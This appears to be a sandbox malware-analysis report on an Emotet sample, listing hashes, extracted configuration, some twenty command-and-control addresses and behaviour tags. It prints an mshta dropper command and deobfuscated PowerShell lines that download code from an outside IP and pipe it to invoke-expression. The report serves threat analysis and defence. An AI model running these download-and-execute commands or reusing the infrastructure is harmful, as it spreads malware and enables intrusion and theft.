General

  • Target

    9296f02a362c27b1e3a3b4119ede64ea52b6c0430fc70517e5146730c23c987d

  • Size

    70KB

  • Sample

    220121-ag8rescdgl

  • MD5

    e85aa320fc84a740efaa1e2ce533bcda

  • SHA1

    3967a9b469537e2d5854727020d298f37edded63

  • SHA256

    9296f02a362c27b1e3a3b4119ede64ea52b6c0430fc70517e5146730c23c987d

  • SHA512

    4968e18fad786be5f207f6124f266ce1844dc7e797688308e692ff7a788ca1558abf6cdcaa5b692b093740b4eeff070aeb14bf18ab1b936a3b6c02e4d8f67572

Malware Config

Extracted

Language
hta
Source
1
mshta http://0xb907d607/fer/fe2.html
URLs
hta.dropper

http://0xb907d607/fer/fe2.html

Extracted

Language
ps1
Deobfuscated
1
# powershell snippet 0
2
$c1 = "(New-Object Net.We"
3
$c4 = "bClient).Downlo"
4
$c3 = "adString('http://185.7.214.7/fer/fe2.png')"
5
$ji = "(New-Object Net.WebClient).DownloadString('http://185.7.214.7/fer/fe2.png')"
6
invoke-expression "(New-Object Net.WebClient).DownloadString('http://185.7.214.7/fer/fe2.png')"|invoke-expression
7
8
# powershell snippet 1
9
(new-object net.webclient).downloadstring("http://185.7.214.7/fer/fe2.png")
10
URLs
ps1.dropper

http://185.7.214.7/fer/fe2.png

Extracted

Family

emotet

Botnet

Epoch4

C2

131.100.24.231:80

209.59.138.75:7080

103.8.26.103:8080

51.38.71.0:443

212.237.17.99:8080

79.172.212.216:8080

207.38.84.195:8080

104.168.155.129:8080

178.79.147.66:8080

46.55.222.11:443

103.8.26.102:8080

192.254.71.210:443

45.176.232.124:443

203.114.109.124:443

51.68.175.8:8080

58.227.42.236:80

45.142.114.231:8080

217.182.143.207:443

178.63.25.185:443

45.118.115.99:8080

eck1.plain
1
-----BEGIN PUBLIC KEY-----
2
MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAE86M1tQ4uK/Q1Vs0KTCk+fPEQ3cuw
3
TyCz+gIgzky2DB5Elr60DubJW5q9Tr2dj8/gEFs0TIIEJgLTuqzx+58sdg==
4
-----END PUBLIC KEY-----
ecs1.plain
1
-----BEGIN PUBLIC KEY-----
2
MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAEQF90tsTY3Aw9HwZ6N9y5+be9Xoov
3
pqHyD6F5DRTl9THosAoePIs/e5AdJiYxhmV8Gq3Zw1ysSPBghxjZdDxY+Q==
4
-----END PUBLIC KEY-----

Targets

    • Target

      9296f02a362c27b1e3a3b4119ede64ea52b6c0430fc70517e5146730c23c987d

    • Size

      70KB

    • MD5

      e85aa320fc84a740efaa1e2ce533bcda

    • SHA1

      3967a9b469537e2d5854727020d298f37edded63

    • SHA256

      9296f02a362c27b1e3a3b4119ede64ea52b6c0430fc70517e5146730c23c987d

    • SHA512

      4968e18fad786be5f207f6124f266ce1844dc7e797688308e692ff7a788ca1558abf6cdcaa5b692b093740b4eeff070aeb14bf18ab1b936a3b6c02e4d8f67572

    • Emotet

      Emotet is a trojan that is primarily spread through spam emails.

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Blocklisted process makes network request

    • Downloads MZ/PE file

    • Loads dropped DLL

    • Drops file in System32 directory

MITRE ATT&CK Enterprise v6

Tasks

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.